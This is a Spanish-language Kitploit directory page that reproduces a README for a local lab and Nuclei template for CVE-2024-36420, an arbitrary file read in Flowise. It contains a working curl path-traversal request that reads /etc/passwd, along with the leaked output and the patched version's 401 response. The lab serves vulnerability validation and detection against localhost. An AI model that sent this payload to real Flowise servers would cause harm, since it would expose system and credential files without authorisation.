Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC_CVE-2024-36420 — Laboratorio de reproducción local y plantilla Nuclei para CVE-2024-36420, una vulnerabilidad de lectura arbitraria de archivos en Flowise a través del parámetro fileName sin sanitizar. Valida el comportamiento vulnerable (1.4.3) y parcheado (3.1.2). | Kitploit
Herramientas/GitHubGitHub/fineman999/poc_cve-2024-36420
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebFuzzingAprendizaje y EducaciónLabs y Práctica
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

Laboratorio de reproducción local y plantilla Nuclei para CVE-2024-36420, una vulnerabilidad de lectura arbitraria de archivos en Flowise a través del parámetro fileName sin sanitizar. Valida el comportamiento vulnerable (1.4.3) y parcheado (3.1.2).

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC_CVE-2024-36420

Laboratorio de reproducción local y borrador de plantilla nuclei para CVE-2024-36420 que afecta a Flowise.

Resumen

CVE-2024-36420 es una lectura arbitraria de archivos en Flowise causada por el uso no sanitizado del parámetro fileName del cuerpo en:

  • POST /api/v1/openai-assistants-file

Este laboratorio se utilizó para validar:

  • comportamiento vulnerable en flowiseai/flowise:1.4.3
  • comportamiento denegado en la versión más reciente flowiseai/flowise:3.1.2

Referencias

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
  • Archivos

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2024-36420.yaml

    Prueba vulnerable

    Iniciar Flowise 1.4.3:

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 flowise
    

    Verificación manual:

    root@kitploit:~
    curl -i \
      -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
      -H 'Content-Type: application/json' \
      -d '{"fileName":"../../../../etc/passwd"}'
    

    Respuesta vulnerable observada:

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Disposition: attachment; filename=passwd
    ...
    root:x:0:0:root:/root:/bin/ash
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    ...
    

    Control de versión más reciente

    Iniciar Flowise 3.1.2 más reciente:

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 flowise
    

    Verificación manual:

    root@kitploit:~
    curl -i \
      -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
      -H 'Content-Type: application/json' \
      -d '{"fileName":"../../../../etc/passwd"}'
    

    Respuesta de la versión más reciente observada:

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {"error":"Unauthorized Access"}
    

    Nuclei

    Validar la plantilla:

    root@kitploit:~
    nuclei -duc -validate -t CVE-2024-36420.yaml
    

    Ejecutar contra el objetivo vulnerable:

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
    

    Comportamiento esperado:

    • 1.4.3: coincidencia
    • 3.1.2: sin coincidencia

    Notas

    • La diferencia de versión es aceptable porque este repositorio solo afirma el comportamiento observado:
      • vulnerable en 1.4.3
      • denegado en 3.1.2
    • No afirma el límite exacto de la versión parcheada.
    • No se utilizaron objetivos del mundo real.
    Descargar herramienta